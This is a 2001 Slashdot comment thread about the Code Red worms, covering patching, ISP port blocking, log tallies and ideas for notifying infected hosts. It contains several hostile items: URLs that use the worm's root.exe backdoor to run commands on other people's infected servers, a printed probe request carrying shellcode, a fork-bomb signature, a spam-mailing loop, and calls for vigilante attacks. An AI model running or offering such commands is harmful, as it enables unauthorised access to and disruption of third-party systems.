  281. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

    It's been there at least since the first Slashdot article. I patched my server right away. Check under Critical Updates.

  282. Re:and another thing... by norton_I · · Score: 2

    I don't have any objection to ISPs doing that *by default*. I just think they should be able to selectively unblock that for customers who want it, with the stipulation that if you or your computer do bad things with it (like get code red) they will shut off access completely until you fix it.

    @Home just unilaterally shut off all port 80 access (they have had netbios ports shut off all along, I believe).
    Sure I can move my web server to port 81 or 8080, but as a responsible netizen, it pisses me off that I have to.

    And don't whine about me using your bandwidth. I use my web server for personal use, on a service I paid for. It probably uses a whole 100 KB/day. If ATT@Home can't handle that, they need to upgrade their pipe.

  283. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

    On W2K Pro, first you need to select 'custom' networking or some such, then Add Service, then specifically select Internet Information Services. It's not easy to do accidentally.

  284. @Home's response (to me) by dagnabit · · Score: 1

    Got this back after sending abuse@home.com a short list of IPs culled from my Apache log:

    Thank you for your report of Code Red probes.

    While we are not allowed to give out specific information regarding subscriber identity, or specific action taken without legal process, we have identified the offending user and taken appropriate action against this account. If you are receiving 'get' command strings from an @Home user or users, directed at port 80, it is likely that that originating machine has been compromised by the Code Red virus. One of the effects it has is to cause infected machines to search for other machines that would be exploitable. Machines that are running unpatched versions of Windows NT Server or 2000, with a Web Server and IIS (Microsoft Index Server 2.0 or Indexing Service in Windows 2000) are vulnerable to this exploit. If you are NOT running this OS and services, your computer is not subject to this particular compromise.

    So it sounds like they are trying to do something, and apparently sending in IPs can help them weed out problem servers... slow, but better than nothing.

    ...and they didn't even say anything about me running a server in the first place!

  285. Re:Bah. by Aqualung · · Score: 1

    root@localhost:/dir/apache-ssl/logs# ./crhit.pl
    Hit 9400 times by Code Red v1
    Hit 9418 times by Code Red v2
    Code Red 1 avg/host: 127.027027
    Code Red 2 avg/host: 127.270270
    Total avg/host: 254.297297

    This is over about 80 configured virtual hosts. It's a kludgy script since it also checks the SSL server logs, which I don't think are attempted by the virus. The IP addresses cover two class C's for all our hosts.

    --

    - Dave
  286. Re:Just an obvious question or two... by Anonymous Coward · · Score: 0

    yes
    it ate up 100% of our outbound T1 bandwidth.
    it was really going crazy making outbound connections to random IPs.
    the infected machine was affected though not to a standstill.

  287. Re:Wow by mickeyreznor · · Score: 1
    Win2K and NT with the IIS service automatically running and they haven't noticed???

    If I had done an express install, i probably wouldn't have noticed. I did a custom install, however. So my question to you is, are you saying that people who use an express install are incompetent?

  288. ... by Anonymous Coward · · Score: 0

    actually,

    http://IpOfHackedMachine/scripts/root.exe?/c+net+s top+server+/y

  289. Ok. Here's better names. by hivolt · · Score: 1, Funny

    How about
    Code Red: The Phantom Worm.
    Code Red II: Attack of the Clone
    Code Red III: Media's Imagination
    Code Red IV: A New Worm
    Code Red V: The Worm Strikes Back
    Code Red VI: Return of the Worm

    1. Re:Ok. Here's better names. by BilldaCat · · Score: 1, Troll

      You suck. Go away. Forever.

      Take your so-called sense of humor with you.

      --
      BilldaCat
  290. Bad piggyback, but.. by steveo777 · · Score: 1
    What does code red do? I mean, besides spread like horny rabbits over a field of lush, poor-security Windows machines?

    sorry 'bout the somewhat off-topic, but I wanted this to get noticed, I'm going mad.

    --
    This sig isn't original enough, it's time to come up with something witty...
    1. Re:Bad piggyback, but.. by Anonymous Coward · · Score: 0

      puts cmd.exe in the /scripts directory where it is open to the world and can be used to execute any operation on the machine (format c:\ anyone?)

  291. Re:Help me out on this one... by Nightlight3 · · Score: 1
    in this case, default.ida takes everything after that number of letters and runs it as if it were a program.

    What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?

  292. CodeRed and SirCam: Free Software Plot? by kaladorn · · Score: 1

    Not to be Oliver-Stonian, but it seems to me that the profligate number of bugs written to take a hack at the MS security vulnerabilities in IIS, Win xx, etc. might be some sort of covert action by free software types.

    Now, before anyone starts frothing at the cranium, I don't lump all free software types in this class. Nor can I say with any certainty the case I suggest is so.

    Instead, I just suggest it for a thought.

    If Linux is the 2nd largest OS, then why don't we see far more Linux-specific hacks? You could argue that it is the stability and security of the system. Partly, I'd buy that - MS is kinda weak in the security department. But even so, you'd expect to see some MS Tiger Team secretly releasing something nasty to take out the competition. But that doesn't often seem to be the case.

    And the MS attacking virii multiply, in form as well as instance.

    It is just barely possible this is someone's way of saying "Sod Off!" to Bill and Co. If so, though the sentiment is laudable, the action is not.

    Every time one of these virii hits, it "justifies" more restrictive practices in terms of code release, security protocols, limiting interop capabilities, buttoning down and monitoring the net, giving the police and Governments more power to tackle anything they think needs their dirty paws on the Net, etc.

    Maybe what we really need is some White Hat Crackers to take a real stab at nailing these virus-writing pussbags. A dose of their own medicine (or a repeated encounter with a solid surface) might show them the error of their ways...

    Tomb.

    --
    -- Mal: "Well they tell you: never hit a man with a closed fist. But it is, on occasion, hilarious."
    1. Re:CodeRed and SirCam: Free Software Plot? by Tony-A · · Score: 1

      why don't we see far more Linux-specific hacks?
      The exploit is not in IIS but in some Index Server thingee, with no rational explanation as to what it is or why it is. To fix the problem, the right patch has to be found on Microsoft's servers. This seems to be too much trouble for Microsoft to do with Hot Mail and their own internal servers.
      If we did have a CodeRed for RedHat, it would play out much differently. Lots of explanations and fixes. If I'm feeling paranoid, I can download the fix from some random site instead of priority.redhat.com, or even better, just kill the service that I don't want or need. The main difference is that the steps necessary to clip its wings will be taken.

  293. Re:More info on Code Red III by V50 · · Score: 2

    The sad thing is, a while ago one of my Mom's friends, the type who can't understand there is more to a PC than C:\WINDOWS\DESKTOP\, got one something like this in the mail.

    She forwarded it on to everybody she knew, genuinely panicked, wondering how it could do all that, believing every word...

  294. Re:Obviously,IIS is *vastly* more popular than apa by Anonymous Coward · · Score: 0

    There are between 8 and 9 million IIS hosts on the Internet today. Want to know how many apache hosts there are? Here's a hint... A LOT.

  295. Re:An ETHICAL way to Anti-Virus by MavEtJu · · Score: 1

    I've made a small script to do this. It takes the hostname or IP address of a machine to find out information from the whois-database or the SOA fields of the zone.

    It's available from http://www.mavetju.org/networking/tools.phtml as coderedspammer.

    Don't think that this will solve your problems, because there are many many badly misconfigured mailers/dns-servers/whois-databases on the internet. See http://www.mavetju.org/networking/whymailfails.phtml for an overview.

    Edwin

    --
    bash$ :(){ :|:&};:
  296. Re:Copycats by analog_line · · Score: 1, Interesting
    Whaddaya mean it's dead? If the traffic light on my cable modem is any indication, it's still alive and kicking. Maybe it ain't "cool" anymore but it's still out there and making a mess of things.

    The only thing that's going to "let it die" is if the stupidity/incompetence that this virus so neatly reveals is cured and people patch their fucking servers. Until then, there's plenty to talk about. Hell, there's more to talk about. It's getting close to a month that systems have been getting hit by this virus and people are still being infected when an easy solution has been available for over two months. What planet are these people on?

  297. III by chinakow · · Score: 1

    I am starting to actually believe that someone is doing this to prove a point about MS (insecure) and about people (complacent), sorta killing 2 birds (or a few thousand for that matter) with one stone, and doing a very good job of drawing A LOT of attention to both points, just my thoughts


    Jon

  298. What a golden opportunity ... by nobby · · Score: 1

    Well, the obvious way to treat a portscan from a code red infected machine is ...

    [nobby@nobby]$ grep "Packet" /var/log/messages
    Jul 15 20:53:32 pat kernel: Packet log: input DENY ppp0 PROTO=6 xx.xx.xx.xx: 80 203.66.66.66.66:1040 L=...

    [snip]

    [nobby@nobby]$ whois 66.66.66.66

    [snip]

    Server Name: foobar.luser.com
    IP Address: 66.66.66.66
    Registrar: NETWORK SOLUTIONS, INC.
    Whois Server: whois.networksolutions.com
    Referral URL: http://www.networksolutions.com

    [nobby@nobby]$ cat > unsolicited.email
    Dear Sir,

    It has come to my attention that your server FOOBAR
    has been infected with a variation of the CODE RED
    worm. I would like to draw your attention to our
    one-time only introductory offer of a complete new
    webserver installation on a platform GUARANTEED never
    to be infected with the CODE RED worm ever again!

    That's right! For the one time payment of a low, low
    price of only $2999.95, we can completely rebuild your
    web server with a platform GUARANTEED never to be
    infected with CODE RED ever again ...

    This is a never-to-be-repeated once-in-a-lifetime
    offer!

    Yours Sincerely,

    [insert name here]
    ^D
    [nobby@nobby]$ for a in administrator bofh 1337_MCSE_d00d ceo webmaster; do mail -s "Your web server has been infected ..." < unsolicited.email ${a}@luser.com; done

  299. default.ida by Anonymous Coward · · Score: 0

    fix the spaces

    j00 h4v3 b33n 115r353+ 0wnz0r3d\n\n";
    system ("/bin/echo $REMOTE_ADDR 0wnz0r3d >> /var/log/0wnz0r.log");}
    else
    { print "n0 0wnz0r f0r j00\n\n";};

    if ($owned2) { print "j00 h4v3 b33n 5|-|u+d0\/\/n";
    system ("/bin/echo $REMOTE_ADDR 5|-|u+d0\/\/n >> /var/log/0wnz0r.log");}
    else
    { print "n0 5|-|u+d0\/\/n f0r j00";};

    ?>

  300. Re: The solution by Anonymous Coward · · Score: 0
    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
    Obvious! Put a story about them on slashdot, with a link to their server. They'll be shut down in no time!
    Even better: put a Redirect command in Apache's httpd.conf and redirect each worm attempt to Microsoft so they can share the results of their crappy, buggy code.
  301. Re:Microsoft should be sued by TheMidget · · Score: 1
    > but even I will say that a maker of a defective gun should be liable.

    But the point of most of these lawsuits against gun makers is that the plaintiffs want to hold the manufacturers liable even if the gun works as expected, i.e. kills when somebody pulls the trigger, which is kinda ridiculous... It's a little bit as if Microsoft got sued by the MPAA, because an IIS somewhere is serving up DeCSS...

  302. Re:How can you get a BIGGER back door than CRII? by Anonymous Coward · · Score: 0
    With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised.
    Sorry, but no. You don't have write access to \Documents and Settings\All Users\Desktop, and you can't reboot the server or shut down services. Not that I've tried or anything...
  303. Ignorance or Apathy? by CoachS · · Score: 1
    It amazes me how, after all of the publicity, people continue to be absolutely ignorant about security. That extends to not applying important patches and to opening infected messages.

    Just about every day our filters catch copies of SIRCAM and Hybris that some ignoramus somewhere in the world foolishly opened.

    It's not a good reflection on human intelligence. And I don't mean this to be a rant; but really the media is full of information about this. Every responsible I.S. person I know spends considerable effort trying to educate their users. It's common sense and common knowledge that worms and viruses are out there. For some reason none of this sinks in and foolish users will get a bizarre message from a total stranger with an unknown attachment "asking for your advice" and plunge in and open it.

    Maybe the Admin doesn't know every service running on all of his servers (I admit that I don't) but they should know how to quickly find out. As soon as word of Code Red came out, we checked our servers and identified any that were running IIS without our realization. We either removed IIS from those servers or promptly applied the patch. It's a simple process and an important part of being an Admin -- securing your systems. Apparently it's beyond a lot of people.

    It's sad. Darwin would be disappointed.

    -Coach-

    --
    Perhaps the world's greatest tragedy is that ignorance is not impotence.
  304. And then automatically firewall...! by Slur · · Score: 1

    And it occurs to me that an even better addition to the script would be to automagically add the incoming IP address to the firewall chain/table to block it forevermore - or at least for a few weeks until the weather subsides.

    I found that by simply adding about 5 IP ranges to my computer's built-in firewall I got rid of *all* the code red attacks. (This computer hasn't been running 24/7 so it's been pretty well hidden.)

    The key is that Code Red stops learning about your IP once you stop allowing it to find you. Once you block all the *existing* attackers the chances of *new* attackers appearing is lessened quite a bit.

    --
    -- thinkyhead software and media
  305. Re:a harsher solution, perhaps? by WickedLittleSlaveBoy · · Score: 0

    moron? maybe, but I'm not using IIS, so where does that put you, AC?

  306. Re:Microsoft should be sued by Keith Russell · · Score: 3, Informative
    I bet it isn't that hard to do "accidentally"
    Actually, it is. You are never offered the option during the initial installation (i.e. the moment you boot from the CD). You must wait until the entire installation is finished, then select "Add/Remove Windows Components" from the Add/Remove Programs control panel. From there, IIS can be selected. It is not selected by default.
    --
    This sig intentionally left blank.
  307. Re:Buffer overflow vulnerabilities by Anonymous Coward · · Score: 0

    Dude, I think you're missing the point. C++ sucks.

  308. Re:Copycats by Anonymous Coward · · Score: 0

    Wouldn't it be a nice idea if someone could post a simple script so that, upon being attacked, a lynx browser (or curl or wget) is activated and sends a URL with the string to turn off the IIS?

    damn! just today - 400 attacks on my linux... ;(

  309. Re:An ETHICAL way to Anti-Virus by FatOldGoth · · Score: 2

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    I've done something like that already. It actually picks out any entries in the log from the last hour and mails the originators, rather than tailing the log. Help yourself.

    --

    I would be a paid subscriber if Taco and Hemos weren't such cunts
  310. What IP Traffic? by Anonymous Coward · · Score: 0

    64.83.50.230 - - [10/Aug/2001:12:26:26 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

  311. 1000 more /. sigs by EdlinUser · · Score: 1

    Over the last 3 years I've collected 1000 /. sigs you can view here:

    http://www.ipa.net/~jamesmcinis/sig.html

    1. Re:1000 more /. sigs by CaNuK · · Score: 1

      Is mine good enough to make the cut?

      --

      Despite the rising cost of living, it remains a popular activity.
  312. Obviously,IIS is *vastly* more popular than apache by Jerf · · Score: 4, Insightful
    They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

    More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations than anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

    IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

    Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

    "More lusers with vulnerable web servers than ever before - Microsoft Windows 2000."

  313. Like a Movie ... by mlati · · Score: 2, Funny

    I wonder when Rocky ..uh ..Code Red IV will be released?

  314. Most uninformative article ever by AdamInParadise · · Score: 2

    Well, this article is just empty. It just says "There is a Code Red III" and that's it...

    --
    Nobox: Only simple products.
  315. Code Red IV by drift factor · · Score: 1, Redundant

    It's only a matter of time before CR4 hits, monopolizing off of CR2's success, and filling our web logs with GET /scripts/root.exe hits.

  316. Someone should post the IP addresses. by Mustang Matt · · Score: 2

    At first I strongly disagreed with writing an anti-virus that would spread the same way disabling the holes, but shoot after the third edition of this virus, I say post the IPs and let everyone have fun with the servers.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
  317. Re:Back Door? Somebody call the Goatse.cx guy! by Anonymous Coward · · Score: 0

    Not quite. Access to the root.exe would be with the "anonymous IIS user" privileges, which are not root-level. Now, what the trojan EXPLORER.EXE provides is a subject of greater interest...

  318. Re:Oh please, did you see Urban Legend II? by BitchAss · · Score: 1

    Urban Legend II was filmed at my university. Thank you.

    --
    Like sex? Read and write about it! Indecent Blogging
  319. An ETHICAL way to Anti-Virus by Slur · · Score: 5, Interesting

    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very minuscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

    --
    -- thinkyhead software and media
    1. Re:An ETHICAL way to Anti-Virus by Anonymous Coward · · Score: 0
      When someone asks you for default.ida, just give it to them. Maybe it will shut them up.

      cd /var/www/html
      dd if=/dev/urandom of=default.ida count=10000
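
Pulling together the crhit.pl tally in comment 285, the default.ida log line in comment 310, and the notify-the-source-network scripts Slur and FatOldGoth describe, here is an added example (not code from any poster in this thread) that classifies Code Red v1/v2 probes in Apache common-log lines, summarises them per source host and drafts the notice. The sample log lines and the reverse-DNS table are constructed (RFC 5737 documentation addresses), and the filler-length threshold of 20 is an assumption of this example.

```python
"""Spot Code Red probes in an Apache access log and draft notices to the
source networks. Added example for this thread, not code from any poster.
Sample log lines and the reverse-DNS table below are constructed."""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# The worm's probe is a GET for /default.ida with a long filler run in the
# query string: the original pads with N's, the "Code Red II" family with X's.
# The minimum run of 20 is this example's assumption, not a published figure.
PROBE_RE = re.compile(r'^GET /default\.ida\?(?P<pad>N{20,}|X{20,})')

PAD_N, PAD_X = 'N' * 32, 'X' * 32  # real probes use a far longer run
SAMPLE_LOG = [  # constructed sample lines; RFC 5737 documentation addresses
    f'192.0.2.10 - - [10/Aug/2001:12:26:26 -0400] "GET /default.ida?{PAD_N}=a HTTP/1.0" 404 205',
    f'192.0.2.10 - - [10/Aug/2001:12:31:02 -0400] "GET /default.ida?{PAD_N}=a HTTP/1.0" 404 205',
    f'198.51.100.7 - - [10/Aug/2001:13:02:44 -0400] "GET /default.ida?{PAD_X}=a HTTP/1.0" 404 205',
    '203.0.113.5 - - [10/Aug/2001:13:05:10 -0400] "GET /index.html HTTP/1.0" 200 1043',
    'this line is not in common log format and must be skipped',
]
FAKE_RDNS = {'192.0.2.10': 'dsl-10.example.net'}  # constructed stand-in for PTR lookups


def parse_line(line):
    """Return (host, timezone-aware datetime, request) or None for a non-CLF line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group('time'), '%d/%b/%Y:%H:%M:%S %z')
    return m.group('host'), when, m.group('request')


def classify(request):
    """'v1' for an N-padded probe, 'v2' for an X-padded one, None otherwise."""
    m = PROBE_RE.match(request)
    if m is None:
        return None
    return 'v1' if m.group('pad').startswith('N') else 'v2'


def probes(lines):
    """Yield (host, when, variant) for every Code Red probe found in the log."""
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, when, request = parsed
        variant = classify(request)
        if variant:
            yield host, when, variant


def summary(lines):
    """Totals and per-host averages in the spirit of crhit.pl's report."""
    totals, hosts = Counter(), set()
    for host, _when, variant in probes(lines):
        totals[variant] += 1
        hosts.add(host)
    n, total = len(hosts), sum(totals.values())
    return {
        'v1': totals['v1'], 'v2': totals['v2'], 'total': total, 'hosts': n,
        'v1_avg_per_host': totals['v1'] / n if n else 0.0,
        'v2_avg_per_host': totals['v2'] / n if n else 0.0,
        'total_avg_per_host': total / n if n else 0.0,
    }


def recent_sources(lines, now, window=timedelta(hours=1)):
    """Source addresses that probed within `window` before `now`: what a periodic
    cron job would hand to the notifier instead of tailing the log."""
    return {host for host, when, _v in probes(lines) if now - window <= when <= now}


def draft_notice(ip, hostname, target='my web server'):
    """Form letter modelled on the one quoted in the thread; `hostname` is None
    when the reverse lookup failed, and the wording changes accordingly."""
    if hostname:
        seen_as = f'which a reverse lookup shows as {hostname}'
    else:
        seen_as = 'for which no reverse lookup exists'
    return (f'A copy of the Code Red worm on your network is probing {target}.\n'
            f'The source IP address is {ip}, {seen_as}. If this is a customer on\n'
            'your network, please let them know their NT/2000 server running IIS\n'
            'has been compromised: it needs to be cleaned or rebuilt and patched.')


if __name__ == '__main__':
    print(summary(SAMPLE_LOG))
    now = datetime(2001, 8, 10, 13, 10, tzinfo=timezone(timedelta(hours=-4)))
    for ip in sorted(recent_sources(SAMPLE_LOG, now)):
        print(draft_notice(ip, FAKE_RDNS.get(ip)))
```

Feeding the real access log is a matter of passing `open('access_log')` in place of `SAMPLE_LOG`; a resolver built on `socket.gethostbyaddr` can replace the constructed table.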

  320. Re:make some money off banner ads by ekrout · · Score: 1

    I refuse to enter a battle of the wits with you --it's against my morals to attack an unarmed person.

    --

    If you celebrate Xmas, befriend me (538
  321. Please by Tebriel · · Score: 0, Redundant

    As a personal favor... PATCH YOUR FSCKING SERVER! Thanks.

    --
    The Blaster Master Fighting for Truth, Justice, and Evil Pie since 1979
    1. Re:Please by Black Parrot · · Score: 2

      > If Microsoft can't even patch their own servers then how can anyone expect others to do it properly?

      The Register is reporting that the worm is now ravaging Microsoft's internal network, because some foo brought in an infected laptop and plugged it in behind the firewall.

      --
      Sheesh, evil *and* a jerk. -- Jade
    2. Re:Please by truthsearch · · Score: 4, Flamebait

      If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has fewer vulnerabilities.

    3. Re:Please by tb3 · · Score: 2

      It's worse than that. Not only did it infect Hotmail servers, but servers on Microsoft's internal network.

      --

      www.lucernesys.com Horizon: Calendar-based personal finance

  322. Bah. by austad · · Score: 2

    I'm unable to find any more info on it. Until I see a more comprehensive story, I'm chalking this one up as a gullible journalist (that's redundant) who reports on rumors.

    I haven't noticed anything different in my logs, and I probably should have by now as I've been seeing over 20,000 attempts per day. All are still "NNNNNNNNNN....." (of course, this might be the same with CR3).

    --
    Need Free Juniper/NetScreen Support? JuniperForum
    1. Re:Bah. by The_Weevil · · Score: 1

      How about an Apache server, PERIOD?

      People use MS for no reason, it's slow, it costs money, it's full of holes. Apache can have FP2000 extensions and ASP (asp at a price i think...). Quite why people use MS is really beyond me. It's nice to see all those dumb .jsp pages on the net disappearing and nice .php ones appearing instead.

      Weevil

      --
      ghaa.
    2. Re:Bah. by Airneil · · Score: 1

      I've got a page that tracks the hits on my site.

      700+ total.

      What I want to know is why am I seeing just a fraction of the traffic others are reporting.

      (I'm not complaining...)

    3. Re:Bah. by Anonymous Coward · · Score: 0

      Look for a program called "Hogwash"; it'll filter out all the bad http requests...

    4. Re:Bah. by Anonymous Coward · · Score: 0

      Then don't install the patch. Just remove ida/idq mappings and redirects, dipshit.

    5. Re:Bah. by Anonymous Coward · · Score: 0

      Or how about just patching the IIS box?

    6. Re:Bah. by Anonymous Coward · · Score: 0

      Hope you don't take this the wrong way...

      But imagine if you applied that argument to anything else.

      For example, let's apply it to speakers. Where I work all the client computers (that are configured for sound) have $2 "Yamada" brand sound systems.

      Therefore the auditorium should have a "Yamada" brand sound solution, since it's easier to support just one platform, and the techs are used to Yamada "Quality".

    7. Re:Bah. by Airneil · · Score: 1

      So you have about 500 addresses that can get hit.

      That would mean you are 500 times as likely to be targeted as my single IP address.

      Or am I missing something?

    8. Re:Bah. by Zaknafein500 · · Score: 1

      I'm on around 500 since the 1st, on a 213.*.0.0 network. Other people have been getting them every second or two (at peak times)

      There seems to be a lot of IIS servers running on cable modems. I am on RoadRunner in the 65.0.0.0 class A. My firewall has been getting hits from machines in this same range constantly for the last few days.

      --

      "The guide is definitive, reality is frequently inaccurate."
    9. Re:Bah. by mjh · · Score: 4, Informative
      I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

      You might be interested in this article titled, "Securing an unpatchable webserver"

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    10. Re:Bah. by gordzilla · · Score: 1

      I think this might be a new release based on CR2. I was being pounded by CR2 last weekend, but it died off pretty quickly (about 1 or 2 hits a day). Now at 12:00pm EST today, I started getting pounded again with "XXX". So it's either a second round of CR2 or it's a new variation.

    11. Re:Bah. by Syberghost · · Score: 3, Insightful

      No, this fun new version is "XXXXXXXX".

      And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.

      I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

      The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.

    12. Re:Bah. by tijnbraun · · Score: 1

      actually php is quite unsafe if not used properly (even in comparison to asp sometimes) A Study In Scarlet. Exploiting Common Vulnerabilities in PHP Applications. And I can assure you that java doesn't have these holes ;)

    13. Re:Bah. by Anonymous Coward · · Score: 0

      I wonder when somebody will code a variant that randomizes that long, obvious string...

    14. Re:Bah. by Ryokurin · · Score: 1

      Fuck you.

      The guy said that he didn't see any news sites that had information about it, so I put a link up. Why don't you read first and quit trying to be a smartass!

    15. Re:Bah. by isorox · · Score: 1

      I'm on around 500 since the 1st, on a 213.*.0.0 network. Other people have been getting them every second or two (at peak times)

    16. Re:Bah. by Delphis · · Score: 1

      Actually, make that 1917 attempts counting all websites across all machines.. that's not a lot compared to other people's findings I guess. Not that I'm complaining either.. There is certainly repetition in the addresses too as well as attempts from the same machine (as someone else pointed out) .. so it just looks like maybe just a fraction of that number of individual machines that found our particular class C.

      --
      Delphis
    17. Re:Bah. by Ratbert42 · · Score: 1

      I'm seeing very few hits on my FreeBSD/Apache server, because it's hosted at a colocation facility that's mostly FreeBSD/Apache. The XXXX version tends to scan similar IP addresses, so I haven't seen many of those there.

      I've seen quite a few at my company because they are on a business-class cable modem service. They're getting pounded by similar IPs.

      My OpenBSD box at home (cable modem) is getting pounded too, but it's mostly ARPs and other broadcast crap related to attacks on neighboring IP addresses. I was getting roughly 1,500 attempts a day when I stopped logging connection attempts to port 80.

  323. Don't know if this will work, but by Anonymous Coward · · Score: 0

    http://IpOfHackedMachine/scripts/root.exe?/c+net+s top+server

  324. and another thing... by dermotfitz · · Score: 1

    why the hell don't these friggin huge ISP's hire someone who will disallow port 80 access by default? And 21. And 135/9. Are we living in a civilized society? Are they letting the inmates run the asylum? It's pretty frickin obvious that they are the reason for spread of the viruses. And all you @home/RR website runners can bite me. Go pay for your bandwidth and stop using mine. Besides, if you really have something to offer on your site then how about port 81? How'd that be? I'm sure you could rise above these NT/2K spastics who don't know what the hell they are running and just change ports.

    --

    How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
  325. Because the patch doesn't block all infections by Anonymous Coward · · Score: 1, Insightful
    Because the patch doesn't block all infections

    http://www.incidents.org/diary/august2001.php#801 courtesy of incidents.org

  326. Favorite Quote on the subject: by iforgotmyfirstlogon · · Score: 1

    Favorite Quote on the subject:

    "I'll be glad when that virus gets out of Beta..."
    -G.B.

    -Freed

    --
    "Coffee should be black as hell, strong as death, and sweet as love." -Turkish Proverb
  327. Re:I saw that Reuters story earlier by Anonymous Coward · · Score: 0
    So why is anyone surprised if large cable/dsl networks start blocking webservers? It's brutal, but at least that'll reach them

    All the more reason to write something that permanently takes these machines offline before they screw up all of our capabilities with our ISPs.

  328. Re:More info on Code Red III by onosendai · · Score: 1

    For those who aren't enlightened, over on kuro5hin, there's an interesting piece on the legitimacy of the 'Good Times' virus (yes, i am a karma whore).

    When it was first around, a lot of it seemed impossible, which made it so funny to the more tech-aware, and so scary to the rest. Yet these days life is beginning to imitate art: recalibration of the refrigerator -> Jini, e.g.?

    --
    <? include ('signature.inc'); ?>
  329. Re:Apache infected by Code Red! by Defiant+One · · Score: 1

    Hmmm, even if you do that, you'll still have the junk in your logs, and that huge query string with the XX's or NN's is still going to be a part of the URL request.

    I thought of simply redirecting the request to M$ - I mean, it's their freakin' problem, right? - I've had about 50 hits to this default.ida just in the last two days from the main dotcom site which is linked via a single href to a DSL backend, along with neighbors in my DSL range, 64. But, then I've done that kinda thing before and it doesn't change a damn thing, and I still have to look at that junk in my logs. It only changes the log entry from a 404 to a 302, wow.

    It's like when someone links to an image you host and won't let go: Even though you redirect it and rename the image, you STILL have to see that 302'ed request in the logs...(There oughta be a law!)[[ and on that note, I've had a two year fight with a certain Geocities/Yahoo webmaster who WILL NOT stop linking to an image, even though it has been a broken link on their site for over a year!! WTF?? ]]

    BTW, are you SURE Apache can be infected by Code Red???, 'cause I really don't think that's accurate..

    --
    You will outgrow your usefulness - actual Slashdot footer quote
  330. Re:Microsoft should be sued by szomb · · Score: 1

    You have just made an excellent point for a Code Red IV that scrambles the fucking hard drive like a bacon egg n cheese.

    People might not care about network bandwidth but they'll care about their data.

    --
    Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  331. Re:Microsoft should be sued by Mathetes · · Score: 1

    Maybe because Microsoft released the patch for the hole over a month ago? Why don't admins just apply the patch!

  332. Re:Copycats by Zico · · Score: 1

    You don't need to install any patch to make your computer immune to Code Red, so what's their excuse?

  333. interesting thing about whitehouse.gov by Ryu2 · · Score: 2

    Have you noticed that they are using Akamai now to distribute the content of whitehouse.gov? I guess it's so that they can't be DDOSed in the future with a variant of Code Red (changing the IP address of whitehouse.gov was only a stopgap measure).

    --
    There's 10 types of people in this world, those who understand binary and those who don't.
  334. What to do about the CodeRed Victim sites by IBitOBear · · Score: 1

    I understand that Code Red provides a root exploit...
    If you are getting code-redded by a site, then maybe you should use the root exploit to disable the IIS server or just remove kernel.exe
    That is, someone should dummy up a default.iap (or whatever) for Apache boxes that will settle the issue once and for all and then post it where it can be got to by us violated Linux sites.
    No, your honor, I shot a *TRESPASSER*... I didn't go out and hunt down a victim.
    NOTE: Add "8-)"s as you feel appropriate

    --
    Innocent people shouldn't be forced to pay for inferior software development.
    --"Code Complete" Microsoft Press
  335. And the astroturfers sang a new song. by Black+Parrot · · Score: 2

